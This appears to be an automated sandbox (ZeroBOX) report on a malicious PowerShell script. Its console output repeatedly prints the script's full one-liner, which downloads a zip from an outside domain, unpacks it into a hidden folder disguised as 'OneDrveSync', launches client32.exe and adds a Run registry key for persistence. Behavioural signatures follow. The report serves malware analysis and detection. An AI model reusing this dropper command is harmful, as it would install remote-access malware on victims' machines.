Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 19, 2023, 9:26 a.m.	April 19, 2023, 9:29 a.m.

Size	505.0B
Type	ASCII text, with very long lines, with no line terminators
MD5	`126d0143c4a72b552b57453b5144bdae`
SHA256	`7f1bfe31baacd8ec5ae271d00b32bc39b244191a99349b570d4d16ef77a4eaab`
CRC32	`16B4EB1A`
ssdeep	`12:lksArEbY19VUXQBBU5akqHXxtEhRALoepf1VVj031C3n:gYs19aXQBC5az3xtEnuLJ1VVG1C3`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\script.ps1
3060

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 105 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: The term 'Start-BitsTransfer' is not recognized as the name of a cmdlet, functi console_handle: 0x00000023	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: on, script file, or operable program. Check the spelling of the name, or if a p console_handle: 0x0000002f	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: ath was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\script.ps1:1 char:143 console_handle: 0x00000047	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: + cd $env:AppData; $link="https://gold-fish.top/glazgo.zip"; $path=$env:APPDATA console_handle: 0x00000053	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: +"\dn.zip"; $pzip=$env:APPDATA+"\OneDrveSync"; Start-BitsTransfer <<<< -Source console_handle: 0x0000005f	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: $link -Destination $Path; expand-archive -path .\dn.zip -destinationpath $pzip console_handle: 0x0000006b	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: ; $FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $pa console_handle: 0x00000077	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: th; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemProperty console_handle: 0x00000083	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrveSync console_handle: 0x0000008f	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: " -Value $fstr -PropertyType "String"; console_handle: 0x0000009b	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Start-BitsTransfer:String) [], console_handle: 0x000000a7	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: CommandNotFoundException console_handle: 0x000000b3	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000bf	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: The term 'expand-archive' is not recognized as the name of a cmdlet, function, console_handle: 0x000000df	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: script file, or operable program. Check the spelling of the name, or if a path console_handle: 0x000000eb	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: was included, verify that the path is correct and try again. console_handle: 0x000000f7	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\script.ps1:1 char:192 console_handle: 0x00000103	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: + cd $env:AppData; $link="https://gold-fish.top/glazgo.zip"; $path=$env:APPDATA console_handle: 0x0000010f	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: +"\dn.zip"; $pzip=$env:APPDATA+"\OneDrveSync"; Start-BitsTransfer -Source $link console_handle: 0x0000011b	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: -Destination $Path; expand-archive <<<< -path .\dn.zip -destinationpath $pzip console_handle: 0x00000127	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: ; $FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $pa console_handle: 0x00000133	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: th; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemProperty console_handle: 0x0000013f	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrveSync console_handle: 0x0000014b	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: " -Value $fstr -PropertyType "String"; console_handle: 0x00000157	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: + CategoryInfo : ObjectNotFound: (expand-archive:String) [], Comm console_handle: 0x00000163	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: andNotFoundException console_handle: 0x0000016f	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000017b	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: Get-Item : Cannot find path 'C:\Users\test22\AppData\Roaming\OneDrveSync' becau console_handle: 0x0000019b	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: se it does not exist. console_handle: 0x000001a7	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\script.ps1:1 char:246 console_handle: 0x000001b3	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: + cd $env:AppData; $link="https://gold-fish.top/glazgo.zip"; $path=$env:APPDATA console_handle: 0x000001bf	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: +"\dn.zip"; $pzip=$env:APPDATA+"\OneDrveSync"; Start-BitsTransfer -Source $link console_handle: 0x000001cb	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: -Destination $Path; expand-archive -path .\dn.zip -destinationpath $pzip; $FOL console_handle: 0x000001d7	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: D=Get-Item <<<< $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $pa console_handle: 0x000001e3	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: th; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemProperty console_handle: 0x000001ef	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrveSync console_handle: 0x000001fb	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: " -Value $fstr -PropertyType "String"; console_handle: 0x00000207	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: + CategoryInfo : ObjectNotFound: (C:\Users\test22...ing\OneDrveSy console_handle: 0x00000213	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: nc:String) [Get-Item], ItemNotFoundException console_handle: 0x0000021f	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetIt console_handle: 0x0000022b	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: emCommand console_handle: 0x00000237	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: Property 'attributes' cannot be found on this object; make sure it exists and i console_handle: 0x00000257	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: s settable. console_handle: 0x00000263	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\script.ps1:1 char:267 console_handle: 0x0000026f	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: + cd $env:AppData; $link="https://gold-fish.top/glazgo.zip"; $path=$env:APPDATA console_handle: 0x0000027b	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: +"\dn.zip"; $pzip=$env:APPDATA+"\OneDrveSync"; Start-BitsTransfer -Source $link console_handle: 0x00000287	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: -Destination $Path; expand-archive -path .\dn.zip -destinationpath $pzip; $FOL console_handle: 0x00000293	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: D=Get-Item $pzip -Force; $FOLD. <<<< attributes='Hidden'; Remove-Item -path $pa console_handle: 0x0000029f	1	1
WriteConsoleW April 19, 2023, 9:27 a.m.	buffer: th; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemProperty console_handle: 0x000002ab	1	1

Uses Windows APIs to generate a cryptographic key (15 events)

Time & API	Arguments	Status	Return
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 19, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f4858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 19, 2023, 9:27 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (23 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02649000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06430000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06431000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06432000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06433000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05721000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05723000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06150000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06434000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05726000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05431000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0264d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05728000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05729000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2023, 9:27 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDrveSync

reg_value

C:\Users\test22\AppData\Roaming\OneDrveSync\client32.exe

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

client32.exe

script.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All